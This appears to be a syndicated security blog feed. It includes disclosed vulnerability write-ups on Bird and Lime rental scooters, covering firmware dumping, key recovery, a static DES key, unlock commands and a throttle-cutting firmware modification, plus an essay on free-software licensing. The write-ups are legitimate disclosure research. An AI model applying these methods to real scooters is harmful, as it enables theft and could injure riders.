As mentioned previously, the existing firmware code responded to writes to this register by saving it to its RAM. My plan was to stick my new code in unused space at the end of the firmware, including code that duplicated the firmware’s existing functionality. I could then replace the existing code that stored the register value with code that branched to my code, did whatever I wanted and then branched back to the original code. I hacked together some assembly that did the right thing in the most brute force way possible, but while Ghidra was happy with most of the code it wasn’t happy with the instruction that branched from the original code to the new code, or the instruction at the end that returned to the original code. The branch instruction differs from a jump instruction in that it gives a relative offset rather than an absolute address, which means that branching to nearby code can be encoded in fewer bytes than going further. I was specifying the longest jump encoding possible in my assembly (that’s what the :l means), but the linker was rewriting that to a shorter one. Ghidra was interpreting the shorter branch as a negative offset, and it wasn’t clear to me whether this was a binutils bug or a Ghidra bug. I ended up just hacking that code out of binutils so it generated code that Ghidra was happy with and got on with life.

Writing values directly to that EC register showed that it worked, which meant I could add an ACPI device that exposed the functionality to the OS. My goal here is to produce a standard Coreboot radio control device that other Coreboot platforms can implement, and then just write a single driver that exposes it. I wrote one for Linux that seems to work.

In summary: closed-source code is more annoying to improve, but that doesn’t mean it’s impossible. Also, strange Russians on forums make everything easier.

comment count unavailable comments

Letting Birds scooters fly free

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53258.html

(Note: These issues were disclosed to Bird, and they tell me that fixes have rolled out. I haven’t independently verified)

Bird produce a range of rental scooters that are available in multiple markets. With the exception of the Bird Zero[1], all their scooters share a common control board described in FCC filings. The board contains three primary components – a Nordic NRF52 Bluetooth controller, an STM32 SoC and a Quectel EC21-V modem. The Bluetooth and modem are both attached to the STM32 over serial and have no direct control over the rest of the scooter. The STM32 is tied to the scooter’s engine control unit and lights, and also receives input from the throttle (and, on some scooters, the brakes).

The pads labeled TP7-TP11 near the underside of the STM32 and the pads labeled TP1-TP5 near the underside of the NRF52 provide Serial Wire Debug, although confusingly the data and clock pins are the opposite way around between the STM and the NRF. Hooking this up via an STLink and using OpenOCD allows dumping of the firmware from both chips, which is where the fun begins. Running strings over the firmware from the STM32 revealed “Set mode to Free Drive Mode”. Challenge accepted.

Working back from the code that printed that, it was clear that commands could be delivered to the STM from the Bluetooth controller. The Nordic NRF52 parts are an interesting design – like the STM, they have an ARM Cortex-M microcontroller core. Their firmware is split into two halves, one the low level Bluetooth code and the other application code. They provide an SDK for writing the application code, and working through Ghidra made it clear that the majority of the application firmware on this chip was just SDK code. That made it easier to find the actual functionality, which was just listening for writes to a specific BLE attribute and then hitting a switch statement depending on what was sent. Most of these commands just got passed over the wire to the STM, so it seemed simple enough to just send the “Free drive mode” command to the Bluetooth controller, have it pass that on to the STM and win. Obviously, though, things weren’t so easy.

It turned out that passing most of the interesting commands on to the STM was conditional on a variable being set, and the code path that hit that variable had some impressively complicated looking code. Fortunately, I got lucky – the code referenced a bunch of data, and searching for some of the values in that data revealed that they were the AES S-box values. Enabling the full set of commands required you to send an encrypted command to the scooter, which would then decrypt it and verify that the cleartext contained a specific value. Implementing this would be straightforward as long as I knew the key.

Most AES keys are 128 bits, or 16 bytes. Digging through the code revealed 8 bytes worth of key fairly quickly, but the other 8 bytes were less obvious. I finally figured out that 4 more bytes were the value of another Bluetooth variable which could be simply read out by a client. The final 4 bytes were more confusing, because all the evidence made no sense. It looked like it came from passing the scooter serial number to atoi(), which converts an ASCII representation of a number to an integer. But this seemed wrong, because atoi() stops at the first non-numeric value and the scooter serial numbers all started with a letter[2]. It turned out that I was overthinking it and for the vast majority of scooters in the fleet, this section of the key was always “0”.

At that point I had everything I need to write a simple app to unlock the scooters, and it worked! For about 2 minutes, at which point the network would notice that the scooter was unlocked when it should be locked and sent a lock command to force disable the scooter again. Ah well.

So, what else could I do? The next thing I tried was just modifying some STM firmware and flashing it onto a board. It still booted, indicating that there was no sort of verified boot process. Remember what I mentioned about the throttle being hooked through the STM32’s analogue to digital converters[3]? A bit of hacking later and I had a board that would appear to work normally, but about a minute after starting the ride would cut the throttle. Alternative options are left as an exercise for the reader.

Finally, there was the component I hadn’t really looked at yet. The Quectel modem actually contains its own application processor that runs Linux, making it significantly more powerful than any of the chips actually running the scooter application[4]. The STM communicates with the modem over serial, sending it an AT command asking it to make an SSL connection to a remote endpoint. It then uses further AT commands to send data over this SSL connection, allowing it to talk to the internet without having any sort of IP stack. Figuring out just what was going over this connection was made slightly difficult by virtue of all the debug functionality having been ripped out of the STM’s firmware, so in the end I took a more brute force approach – I identified the address of the function that sends data to the modem, hooked up OpenOCD to the SWD pins on the STM, ran OpenOCD’s gdb stub, attached gdb, set a breakpoint for that function and then dumped the arguments being passed to that function. A couple of minutes later and I had a full transaction between the scooter and the remote.

The scooter authenticates against the remote endpoint by sending its serial number and IMEI. You need to send both, but the IMEI didn’t seem to need to be associated with the serial number at all. New connections seemed to take precedence over existing connections, so it would be simple to just pretend to be every scooter and hijack all the connections, resulting in scooter unlock commands being sent to you rather than to the scooter or allowing someone to send fake GPS data and make it impossible for users to find scooters.

In summary: Secrets that are stored on hardware that attackers can run arbitrary code on probably aren’t secret, not having verified boot on safety critical components isn’t ideal, devices should have meaningful cryptographic identity when authenticating against a remote endpoint.

Bird responded quickly to my reports, accepted my 90 day disclosure period and didn’t threaten to sue me at any point in the process, so good work Bird.

(Hey scooter companies I will absolutely accept gifts of interesting hardware in return for a cursory security audit)

[1] And some very early M365 scooters
[2] The M365 scooters that Bird originally deployed did have numeric serial numbers, but they were 6 characters of type code followed by a / followed by the actual serial number – the number of type codes was very constrained and atoi() would terminate at the / so this was still not a large keyspace
[3] Interestingly, Lime made a different design choice here and plumb the controls directly through to the engine control unit without the application processor having any involvement
[4] Lime run their entire software stack on the modem’s application processor, but because of [3] they don’t have any realtime requirements so this is more straightforward

comment count unavailable comments

Investigating the security of Lime scooters

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/53024.html

(Note: to be clear, this vulnerability does not exist in the current version of the software on these scooters. Also, this is not the topic of my Kawaiicon talk.)

I’ve been looking at the security of the Lime escooters. These caught my attention because:
(1) There’s a whole bunch of them outside my building, and
(2) I can see them via Bluetooth from my sofa
which, given that I’m extremely lazy, made them more attractive targets than something that would actually require me to leave my home. I did some digging. Limes run Linux and have a single running app that’s responsible for scooter management. They have an internal debug port that exposes USB and which, until this happened, ran adb (as root!) over this USB. As a result, there’s a fair amount of information available in various places, which made it easier to start figuring out how they work.

The obvious attack surface is Bluetooth (Limes have wifi, but only appear to use it to upload lists of nearby wifi networks, presumably for geolocation if they can’t get a GPS fix). Each Lime broadcasts its name as Lime-12345678 where 12345678 is 8 digits of hex. They implement Bluetooth Low Energy and expose a custom service with various attributes. One of these attributes (0x35 on at least some of them) sends Bluetooth traffic to the application processor, which then parses it. This is where things get a little more interesting. The app has a core event loop that can take commands from multiple sources and then makes a decision about which component to dispatch them to. Each command is of the following form:

AT+type,password,time,sequence,data$

where type is one of either ATH, QRY, CMD or DBG. The password is a TOTP derived from the IMEI of the scooter, the time is simply the current date and time of day, the sequence is a monotonically increasing counter and the data is a blob of JSON. The command is terminated with a $ sign. The code is fairly agnostic about where the command came from, which means that you can send the same commands over Bluetooth as you can over the cellular network that the Limes are connected to. Since locking and unlocking is triggered by one of these commands being sent over the network, it ought to be possible to do the same by pushing a command over Bluetooth.

Unfortunately for nefarious individuals, all commands sent over Bluetooth are ignored until an authentication step is performed. The code I looked at had two ways of performing authentication – you could send an authentication token that was derived from the scooter’s IMEI and the current time and some other stuff, or you could send a token that was just an HMAC of the IMEI and a static secret. Doing the latter was more appealing, both because it’s simpler and because doing so flipped the scooter into manufacturing mode at which point all other command validation was also disabled (bye bye having to generate a TOTP). But how do we get the IMEI? There’s actually two approaches:

1) Read it off the sticker that’s on the side of the scooter (obvious, uninteresting)
2) Take advantage of how the scooter’s Bluetooth name is generated

Remember the 8 digits of hex I mentioned earlier? They’re generated by taking the IMEI, encrypting it using DES and a static key (0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88), discarding the first 4 bytes of the output and turning the last 4 bytes into 8 digits of hex. Since we’re discarding information, there’s no way to immediately reverse the process – but IMEIs for a given manufacturer are all allocated from the same range, so we can just take the entire possible IMEI space for the modem chipset Lime use, encrypt all of them and end up with a mapping of name to IMEI (it turns out this doesn’t guarantee that the mapping is unique – for around 0.01%, the same name maps to two different IMEIs). So we now have enough information to generate an authentication token that we can send over Bluetooth, which disables all further authentication and enables us to send further commands to disconnect the scooter from the network (so we can’t be tracked) and then unlock and enable the scooter.

(Note: these are actual crimes)

This all seemed very exciting, but then a shock twist occurred – earlier this year, Lime updated their authentication method and now there’s actual asymmetric cryptography involved and you’d need to engage in rather more actual crimes to obtain the key material necessary to authenticate over Bluetooth, and all of this research becomes much less interesting other than as an example of how other companies probably shouldn’t do it.

In any case, congratulations to Lime on actually implementing security!

comment count unavailable comments

Do we need to rethink what free software is?

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/52907.html

Licensing has always been a fundamental tool in achieving free software’s goals, with copyleft licenses deliberately taking advantage of copyright to ensure that all further recipients of software are in a position to exercise free software’s four essential freedoms. Recently we’ve seen people raising two very different concerns around existing licenses and proposing new types of license as remedies, and while both are (at present) incompatible with our existing concepts of what free software is, they both raise genuine issues that the community should seriously consider.

The first is the rise in licenses that attempt to restrict business models based around providing software as a service. If users can pay Amazon to provide a hosted version of a piece of software, there’s little incentive for them to pay the authors of that software. This has led to various projects adopting license terms such as the Commons Clause that effectively make it nonviable to provide such a service, forcing providers to pay for a commercial use license instead.

In general the entities pushing for these licenses are VC backed companies[1] who are themselves benefiting from free software written by volunteers that they give nothing back to, so I have very little sympathy. But it does raise a larger issue – how do we ensure that production of free software isn’t just a mechanism for the transformation of unpaid labour into corporate profit? I’m fortunate enough to be paid to write free software, but many projects of immense infrastructural importance are simultaneously fundamental to multiple business models and also chronically underfunded. In an era where people are becoming increasingly vocal about wealth and power disparity, this obvious unfairness will result in people attempting to find mechanisms to impose some degree of balance – and given the degree to which copyleft licenses prevented certain abuses of the commons, it’s likely that people will attempt to do so using licenses.

At the same time, people are spending more time considering some of the other ethical outcomes of free software. Copyleft ensures that you can share your code with your neighbour without your neighbour being able to deny the same freedom to others, but it does nothing to prevent your neighbour using your code to deny other fundamental, non-software, freedoms. As governments make more and more use of technology to perform acts of mass surveillance, detention, and even genocide, software authors may feel legitimately appalled at the idea that they are helping enable this by allowing their software to be used for any purpose. The JSON license includes a requirement that “The Software shall be used for Good, not Evil”, but the lack of any meaningful clarity around what “Good” and “Evil” actually mean makes it hard to determine whether it achieved its aims.

The definition of free software includes the assertion that it must be possible to use the software for any purpose. But if it is possible to use software in such a way that others lose their freedom to exercise those rights, is this really the standard we should be holding? Again, it’s unsurprising that people will attempt to solve this problem through licensing, even if in doing so they no longer meet the current definition of free software.

I don’t have solutions for these problems, and I don’t know for sure that it’s possible to solve them without causing more harm than good in the process. But in the absence of these issues being discussed within the free software community, we risk free software being splintered – on one side, with companies imposing increasingly draconian licensing terms in an attempt to prop up their business models, and on the other side, with people deciding that protecting people’s freedom to life, liberty and the pursuit of happiness is more important than protecting their freedom to use software to deny those freedoms to others.

As stewards of the free software definition, the Free Software Foundation should be taking the lead in ensuring that these issues are discussed. The priority of the board right now should be to restructure itself to ensure that it can legitimately claim to represent the community and play the leadership role it’s been failing to in recent years, otherwise the opportunity will be lost and much of the activist energy that underpins free software will be spent elsewhere.

If free software is going to maintain relevance, it needs to continue to explain how it interacts with contemporary social issues. If any organisation is going to claim to lead the community, it needs to be doing that.

[1] Plus one VC firm itself – Bain Capital, an investment firm notorious for investing in companies, extracting as much value as possible and then allowing the companies to go bankrupt

comment count unavailable comments